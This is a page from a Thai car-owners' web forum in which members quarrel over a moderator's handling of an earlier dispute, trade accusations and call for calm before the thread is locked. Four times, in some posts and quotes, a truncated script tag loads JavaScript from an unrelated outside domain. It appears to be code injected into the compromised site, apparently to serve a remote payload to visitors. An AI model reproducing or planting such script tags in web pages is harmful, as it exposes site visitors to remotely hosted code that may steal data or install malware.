"หากไม่รู้จักเจ็บปวด ก็คงไม่ซึ้ง ถึง ความ สุข ใจ"

เอ่อ...คือท่านประธานลืมทิ้งเบอร์โทรไว้อ่ะฮาฟฟ......<script src="https://sport32news.com/civicesgroup.js"></

ปล.อ่านแล้วเข้าใจง่ายได้ใจความดีคับ
ได้รับคำขอบคุณจาก: PAE KUNG  tokykung  TUI_PeTiTe  K_series  sukhothai 
hacker

พุธ, 1 สิงหา 2012 14:50 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
cakecity10

ตรงไหนที่บอกชี้แจงไปแล้ว ตรงไหน สงสัยผมไม่ได้เพิ่มขนาดตัวอักษร ตาคุณเลยมองไม่เห็น

1.
กรณีต่อไปนะ คุณมาพาดพิง อ้างอิง ว่า ผู้ดูแลระบบ "อวย" อวย ใครให้ใคร ว่ากันมาเลย

เหมือนกับที่คุณ "cakecity10" คอย ตาม เฝ้า อัพ ให้กระทู้ของคุณ "Guide6351" รึป่าว

2. คำว่า "พวกคุณ"  ที่คุณบอก หมายถึงใคร หมายถึงทุกคนในบอร์ดเหรอ?

3. ข้อความนี้

หมามันเห่าไว้ พิมพ์ว่า:
hacker

อ้างอิงจาก:
psYchosis
    ขอผมลบกระทู้นี้ได้ไหมครับ
    ผมว่าน่าจะจบได้แล้วนะครับ

cakecity10

psYchosis พิมพ์ว่า:

Guide6351 พิมพ์ว่า:

psYchosis พิมพ์ว่า:
ขอผมลบกระทู้นี้ได้ไหมครับ
    ผมว่าน่าจะจบได้แล้วนะครับ

...

ตอบด้วยครับ
    ถ้าไม่ตอบ ผมจะขอลบ หรือ ล็อคเลยนะครับ
    เดี๋ยวจะมาจะมาว่า ไม่บอกนะครับ
    เพราะเห็นว่า ได้ของแล้ว ผมไม่รู้จะยังไงกันอีกหรือปล่าว

ถ้ายังไม่ได้ของ ถ้าจะเอาเรื่อง จริงแจ้งความไปเลยครับ

การที่จะลบกระทู้ซักกระทู้นึง กระทู้นั้นต้องเป็นกระทู้ที่ไม่มีประโยชน์ และมีคนอื่นที่เห็นว่ามันไม่เหมาะสมแจ้งให้ลบไม่ใช่หรอ แต่เท่าที่เห็น คนอื่น(ส่วนใหญ่)เค้าก็เห็นด้วยและบอกว่ากระทู้นี้มีประโยชน์สำหรับคนที่คิดจะซื้อ-ขาย ของผ่านเว็บ เป็นการเตือนสติทั้งคนซื้อ คนขาย ไม่เข้าใจว่าคุณเดือดร้อนอะไร แต่ถ้าจะใช้อภิสิทธิ์ในการเป็นผู้ดูแลเว็บมาลบกระทู้ เพราะกระทู้บางกระทู้ไม่ถูกใจ หรือเพื่อช่วยเหลือใคร ก็คงไม่มีใครห้ามคุณได้หรอก
    ก็แค่...แสดงความคิดเห็นเท่านั้น!!!!

อ่านมั่งนะ อ่านๆๆ มันคือเหตุที่คุณไม่พอใจผู้ดูแลระบบ แล้วมาพาล ว่าผู้ดูแลระบบเป็นมาเฟีย  หรือจะเถียง !!

คุณตอบผมได้แค่นี้ผมก็ดีใจแล้ว

ความจริงมีอีกตั้งไม่รู้กี่คำถาม ที่คุณ "แถ" จนกลายเป็นทั้งปลาดุกทั้งเงือก ไปแล้ว

แก้ไขล่าสุดโดย เมื่อ พุธ, 1 สิงหา 2012 15:45, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: tokykung  TUI_PeTiTe  Nung_Sodapop    sukhothai  Bonuses01  Wal2n_ES 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

พุธ, 1 สิงหา 2012 14:53 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
TUI_PeTiTe พิมพ์ว่า:
กูก็มาเฟีย....เป็นมาเฟียที่แจกรูปโป๊ครับ 555555

ช่วยได้เยอะเลย ท่าน.. 555
ได้รับคำขอบคุณจาก: TUI_PeTiTe 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 1 สิงหา 2012 15:05 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
เข้ามาดู เปลี่ยนคู่กรณีซะแล้ววววว ผมว่าคงมีคนนั่งขำอยู่เปนแน่แท้ เพราะผลการกระทำของเขา

เอาใจๆไม่ได้อิงการเมือง

"ปล่อยวางซะบ้างก็ได้นะ ยอมรับเหตุและผลซะหน่อยก็ดี"

ปล. PM ไปถามแล้วนะครับ
taguunzae

ชื่อเล่น: นู๋ผึ้ง

เข้าร่วม: 18 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1756
ให้คำขอบคุณ: 1460

พุธ, 1 สิงหา 2012 15:22 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
แอบตามกระทู้นี้มา2วันแล้ว จากเรื่องเล็กๆ ก็กลับกลายเป็นเรื่องใหญ่ ซะงั้น

(ไม่ชอบเห็นพี่ๆมีปัญหากันเลยค่ะ จากใจเลย)

ปล่อยให้มันจบดีกว่าเนอะ เชื่อว่า ทุกคน ก็ต่างมีเหตุลเป็นของตัวเอง แต่เหตุลนั้น..อาจจะไม่เข้าตาถูกใจกันบ้างก็ตาม

ดังนั้นก็ยอมๆ หยุดๆ เหอะค่ะ อย่าต่อความอีกเลย มีแต่จะเสียความรู้สึกพาลแย่กันไปป่าวๆ กลับมา รักกันๆ ดีกว่า
ได้รับคำขอบคุณจาก: koobe  stevie_b8  A-u-T-o-N-o-m-Y 
underhill

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 15:25 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
taguunzae พิมพ์ว่า:
แอบตามกระทู้นี้มา2วันแล้ว จากเรื่องเล็กๆ ก็กลับกลายเป็นเรื่องใหญ่ ซะงั้น

(ไม่ชอบเห็นพี่ๆมีปัญหากันเลยค่ะ จากใจเลย)

ปล่อยให้มันจบดีกว่าเนอะ เชื่อว่า ทุกคน ก็ต่างมีเหตุลเป็นของตัวเอง แต่เหตุลนั้น..อาจจะไม่เข้าตาถูกใจกันบ้างก็ตาม

ดังนั้นก็ยอมๆ หยุดๆ เหอะค่ะ อย่าต่อความอีกเลย มีแต่จะเสียความรู้สึกพาลแย่กันไปป่าวๆ กลับมา รักกันๆ ดีกว่า

เนอะ รักกัน รักกัน ดีกว่า   
tamy2975

เข้าร่วม: 30 ตุลา 2009
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1615
ให้คำขอบคุณ: 1210
พุธ, 1 สิงหา 2012 15:26 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
"ถ้าอยากจะชนะใคร ต้องชนะใจตัวเองก่อน"

อันนี้โดนใจมากๆครับ เข้ามาหาความรู้ หามิตรภาพดีกว่าครับ
ดีกว่าเข้ามาหาศัตรู  อะไรที่ไม่ถูกใจก้อทำเป็นไม่เห็นซะ  จบ!!!
ได้รับคำขอบคุณจาก: sukhothai 
KAATO

เข้าร่วม: 05 กรกฎา 2010
ตอบ: 572

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2827
ให้คำขอบคุณ: 2815

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 1 สิงหา 2012 15:33 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
จะผู้หญิง เด็ก คนแก่ หรือผู้ที่คิดว่าต้องได้รับเกียรติจากผู้อื่นก่อนเสมอ

จะเป็นอะไรข้างบนนั้น ถ้าไม่อยู่ในเหตุผล และลบหลู่เกียรติคนอื่นก่อน

โดยไม่ดูเหตุผลประกอบ ผิด ถูก ดำ ขาว ซ้าย ขวา

กระนั้นแล้ว..................

ผมละไว้ให้วิจารณญาณตอบครับ
ได้รับคำขอบคุณจาก: hacker  ICE@WIN  BLACK_CHERRY04  NeaT ES.  PAE KUNG  sukhothai  moonoy 
Nung_Sodapop

ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

พุธ, 1 สิงหา 2012 15:35 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
คนในเว็ปบอร์ดมีเป็นพันเป็นหมื่น แต่...มีไม่กี่คนที่มีปัญหา เพราะฉะนั้นก็ควรพิจรณาตัวเองในการที่จะอยู่ร่วมกันในสังคมนี้

คนเป็นพันอยู่ได้ไม่มีปัญหาใดๆ แต่ปัญหากลับเกิกกับคนไม่กี่คน อย่างงี้มันไม่ใช่และครับ

บางที คนเราก็ควรจะตัดเนื้อร้ายเพื่อรักษาชีวิตนะครับ
ได้รับคำขอบคุณจาก: hacker  ICE@WIN  koobe  sukhothai 
K_series

ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พุธ, 1 สิงหา 2012 15:37 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ถึงสมาชิกทั้งหลาย รำคาญนิดนึงนะครับ

กำลังเปลี่ยนจากดราม่ามาแอคชั่นแล้ว

ปล.จ๊อบ บางทีเค้าหยาบมาก้อไม่ต้องหยาบกลับไปก้อด้ายยยย เมืงโหดเกิ้น
ได้รับคำขอบคุณจาก: hacker  kaisuh  psYchosis  koobe  tamy2975  sukhothai  boss 
underhill

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 15:39 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
Nung_Sodapop พิมพ์ว่า:
คนในเว็ปบอร์ดมีเป็นพันเป็นหมื่น แต่...มีไม่กี่คนที่มีปัญหา เพราะฉะนั้นก็ควรพิจรณาตัวเองในการที่จะอยู่ร่วมกันในสังคมนี้

คนเป็นพันอยู่ได้ไม่มีปัญหาใดๆ แต่ปัญหากลับเกิกกับคนไม่กี่คน อย่างงี้มันไม่ใช่และครับ

บางที คนเราก็ควรจะตัดเนื้อร้ายเพื่อรักษาชีวิตนะครับ

อ้าว ถ้าต้องตัดเนื้อร้ายที่อยู่ในตัวอีกคน เพื่อให้ตัวเองรอดทำไงอ่ะพี่ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Nung_Sodapop  sukhothai 
civicIT

เข้าร่วม: 10 พฤษภาคม 2010
ตอบ: 402

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 810

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 1 สิงหา 2012 15:48 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
คนเราบางที มันเลือกได้ว่าจะรับ จะหลีก จะหนี หรือ จะรับ จะเอา หรืออย่างไร ก็ได้ บางสิ่งเห็นว่าไม่ดีกะตัวเรา ก็อย่าไปรับปล่อยๆ ไปซะบ้าง อย่าเอามาเป็นอารมณ์จนทำให้เราไม่สุขใจเลย ถ้าคิดว่าสิ่งที่เราเห็น ได้อ่านในบอร์ดมันไม่ดี ก็อย่่ารับ ปล่อยวางซะ ผ่านตาเราไป ไม่ต้องทำไรก็มัน ก็จบล่ะ ชีวิตมีสุข  เราไม่สามารถจะทำ จะมีอะไรได้ 100% ในชีวิตนี้ แต่เราสามารถเลือกรับ เลือกเสพในสิ่งที่เราเห็นว่าดีได้ 100% นะ ถ้าเราเลือกเสพสิ่งไม่ดี เราเองนั่นแหละ ที่จะไม่สงบ และรุ่มร้อนแทน ........... อย่างไง ฝากไว้ด้วยครับ อยากให้บอร์ดกลับมารักกันเหมือนเดิม ปล่อยวาง และ กลับมาทำให้บอร์ด น่าอยู่ ผมขอละนะ  .......... นี่เป็นเหตุผลที่ผมชอบบอร์ด ES แห่งนี้ครับ มิตรภาพ ความจริงใจ ความน่าอยู่ การหยอกเย้าเล่นกัน มันน่าอยู่กว่ากันเยอะนะครับ
ได้รับคำขอบคุณจาก: underhill  ICE@WIN  tokykung  taguunzae  sukhothai 
hacker

พุธ, 1 สิงหา 2012 16:00 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อ้างอิงจาก:

hackerผมไม่รู้นะ อันนี้ความรู้สึกตัวเองล้วนๆเลย แบบตรงๆเลยนะ

ปัญหาของกระทู้นี้มันไม่ได้อยู่ที่ User กูเกรียน

มันอยู่ที่ คุณไม่พอใจอะไร แล้วจ้องจะเล่น ผู้ดูแลระับบหรือป่าว 

อ่านดูดีๆ ถ้าให้ผมสาวมาเป็นข้อๆแล้วอย่าอึ้งนะ 

/////////////////////////////////////////////////////////////////////////////////////////

1. กระทู้ตามพวงกุญแจจากน้องโบ ไม่ว่าใครจะดึงโบดึงอะไรก็แล้วแต่ละ 

2. ผู้ดูแลระบบ เห็นว่ามันอัพ เกือบทุกวัน อัพมาจะ 3 เดือน (แค่สอบถามนะ ไม่ได้ดำเนินการล็อกหรืออะไรทั้งสิ้น) อาจจะเป็นการเริ่มจุดประเด็น

//// ประเด็น ///  อันนี้หน้าสุดท้ายที่ผมตอบไป // จุดประเด็น เพิ่มเนื้อหาให้เผื่อบางคนไม่ได้เข้าไปอ่านลิ้งค์ ผู้ดูแลสอบถามว่า จบได้รึยัง

แต่ไม่มีคำพูดอะไรออกมาจากเจ้าของกระทู้ เลยถามต่อ แล้ว
cakecity10 ก็มากล่าวอ้างประมาณว่า พวกเดียวกัน ช่วยเหลือกันรึป่าว

ซึ่ง ผมก็ได้ตอบไปสุดท้ายว่า ดีนะที่ผู้ดูแลเป็นพี่โอ๋ ถ้าเป็นผม ผมจะลบโดยไม่บอกเลย

3. ต่อมา ไม่ว่ากรณีอะไรก็แล้วแต่ เกิดปัญหานี้ขึ้น // จุดประเด็นต่อมา มีการตั้งกระทู้แดกดันผู้ดูแลเวป // อันนี้ ใครไม่รู้ที่มาที่ไปก็จะมองเป็น

เรื่องขำ ๆ  แต่ถ้าย้อนไปดูข้างบนแล้วจะเข้าใจที่มาที่ไปของกระทู้นี้

4. เอาสิ cakecity10 มาตอบคำถามผมหน่อย อย่าเพิ่งรีบหนี

นี่แหละ ที่ผมบอกเหตุผลว่า มันไม่ได้อยู่ที่ กูเกรียน มันอยู่ที่ "พวกคุณ" คิดอะไรกันอยู่รึป่าว

//////////////////////////////////////////////////////////////////////////////////////////

กรณีต่อไปนะ คุณมาพาดพิง อ้างอิง ว่า ผู้ดูแลระบบ "อวย" อวย ใครให้ใคร ว่ากันมาเลย

เหมือนกับที่คุณ "cakecity10" คอย ตาม เฝ้า อัพ ให้กระทู้ของคุณ "Guide6351" รึป่าว

ยกตัวอย่าง ตัวอย่าง1 หรือ ตัวอย่าง2 อันนี้ไม่รวมถึงกระทู้ประจำโซน หรือ ขายของนะ ไม่อยากลากมาเกี่ยว

/////////////////////////////////////////////////////////////////////////////////////////

อยู่ที่ดุลพินิจในการตัดสินใจนะ สมาชิกทุกท่าน ขอโทษที่ผมเปิดประเด็นนะ

พอดีผมเป็นคนหนึ่งที่เฝ้าอยู่ในเวปตลอดเกือบ 24 ชั่วโมง 

อันนี้นะ ตามที่ผมชี้แจง ทุกท่านที่เข้ามาอ่าน จะได้ทราบถึงที่มาที่ไป

ที่มาที่ไปทั้งหมด มันเริ่มจากตรงนี้แหละครับ
ได้รับคำขอบคุณจาก: ICE@WIN  sukhothai 
Nung_Sodapop

ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

พุธ, 1 สิงหา 2012 16:08 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
underhill พิมพ์ว่า:

อ้าว ถ้าต้องตัดเนื้อร้ายที่อยู่ในตัวอีกคน เพื่อให้ตัวเองรอดทำไงอ่ะพี่ <script src="https://sport32news.com/civicesgroup.js"></

เว็ปบอร์เปรียบเสมือนชีวิตครับ ถ้าอยากให้ชีวิตอยู่อย่างไม่ทรมาน ก็ควรเอาเนื้อร้ายออกครับ

และจะไปเอาเนื้อร้ายคนอื่นออกทำไมล่ะครับ พูดอย่างงี้หรือจะเอาครับ !!  555555++

แซวเล่นๆครับ คลายเครียด 555+
a_na_kim

ชื่อเล่น: คิม

เข้าร่วม: 02 สิงหา 2011
ตอบ: 474

ได้รับคำขอบคุณ: 274
ให้คำขอบคุณ: 1

พุธ, 1 สิงหา 2012 16:10 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ใจเย็นๆครับท่านจ๊อบ....

ขอเป็นกำลังใจท่าน และคณะกรรมการทุกท่าน
nocomment

ชื่อเล่น: ตั้น

เข้าร่วม: 03 ตุลา 2009
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1289
ให้คำขอบคุณ: 1073

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 1 สิงหา 2012 16:19 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อัยย๊ะ...
underhill

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 16:30 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
underhill พิมพ์ว่า:

เว็ปบอร์เปรียบเสมือนชีวิตครับ ถ้าอยากให้ชีวิตอยู่อย่างไม่ทรมาน ก็ควรเอาเนื้อร้ายออกครับ

และจะไปเอาเนื้อร้ายคนอื่นออกทำไมล่ะครับ พูดอย่างงี้หรือจะเอาครับ !!  555555++

แซวเล่นๆครับ คลายเครียด 555+

อ้าว ถ้าเผื่อทางเลือกไงครับพี่ ทุกวันนี้โลกมันโหดร้าย หรือจะเอา <script src="https://sport32news.com/civicesgroup.js"></
Wal2n_ES

ชื่อเล่น: ว่าน

ตอบ: 615

Guru ES
Guru ES

ได้รับคำขอบคุณ: 812
ให้คำขอบคุณ: 819

พุธ, 1 สิงหา 2012 16:35 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
taguunzae พิมพ์ว่า:

รักกันรักกันเนอะเนอะถูกของตัวเองเนอะเนอะ
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

พุธ, 1 สิงหา 2012 16:35 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ว่าแต่ ตอนนี้PM ของเค้าเต็มแล้วอ่ะ 
ได้รับคำขอบคุณจาก: DuuI  zan  sukhothai  battery3k 
kaisuh

ชื่อเล่น: ปอปลา

เข้าร่วม: 17 ตุลา 2008
ตอบ: 2822

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1703
ให้คำขอบคุณ: 8904

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 1 สิงหา 2012 16:40 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
~ สเตฟาน ~ พิมพ์ว่า:
ว่าแต่ ตอนนี้PM ของเค้าเต็มแล้วอ่ะ

เรื่องมันฮอต
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 5 จาก 6
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.